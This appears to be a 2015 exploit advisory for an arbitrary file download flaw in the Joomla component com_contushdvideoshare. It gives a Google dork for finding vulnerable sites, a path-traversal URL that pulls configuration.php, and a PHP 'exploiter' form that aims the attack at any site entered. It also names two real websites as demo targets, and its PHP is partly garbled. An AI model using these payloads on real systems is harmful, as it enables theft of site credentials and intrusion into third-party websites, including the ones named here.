facebook facebook twitter rss

Joomla component com_contushdvideoshare - Arbitrary File Download Vulnerability

Author: AnonJoker , Published: 23-06-2015
# Exploit Title: Joomla component com_contushdvideoshare - Arbitrary File Download Vulnerability
# Google Dork: "com_contushdvideoshare" or "/components/com_contushdvideoshare/hdflvplayer/"
# Date: 23/06/2015
# Exploit Author: AnonJoker
# Vendor Homepage: Dork : www.hdflvplayer.net
# Software Link: http://www.hdflvplayer.net/
# Tested on: Win8, Linux
# Contact : anonjoki@gmail.com | FB.COM/ANONJOKER008
****

Poof Of Concept
localhost//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php

****
Exploit :
//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
****
OR Use MY OWN Exploiter:






<?php

echo "<body bgcolor='#000000' >";

echo 
'<center>';

echo 
'<form method="post">';

echo 
"<h4><font color='white'>www.site.com</font></h4><input type='text' name='target'>";

echo 
'<input type="submit" name="do">';

echo 
'</form>';

echo 
'<body>';

$site $_POST['target'];

$foncution $_POST['do'];

if (isset(
$_POST['do'])) {

   echo 
"<form action='http://{$site}/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php' method='POST'>



 <b>Config</b>:<input type='text' name='_mysite_download_skin' value='../../../../../wp-config.php' placeholder='www.site.com'><br>



<input type='submit' value='Get CFG'>



</form>



</body>"
;

}

echo 
"<h5><font color='white'> AnonJoker | RTH </font></h5>";

echo 
'</center>';

?>



****
DEMO URL:
www.semanasantadesevilla.tv/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
www.fanschoice.tv/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php


#
#
#Greetz* To RTH - MYSELF - MY computer

Like us on Facebook :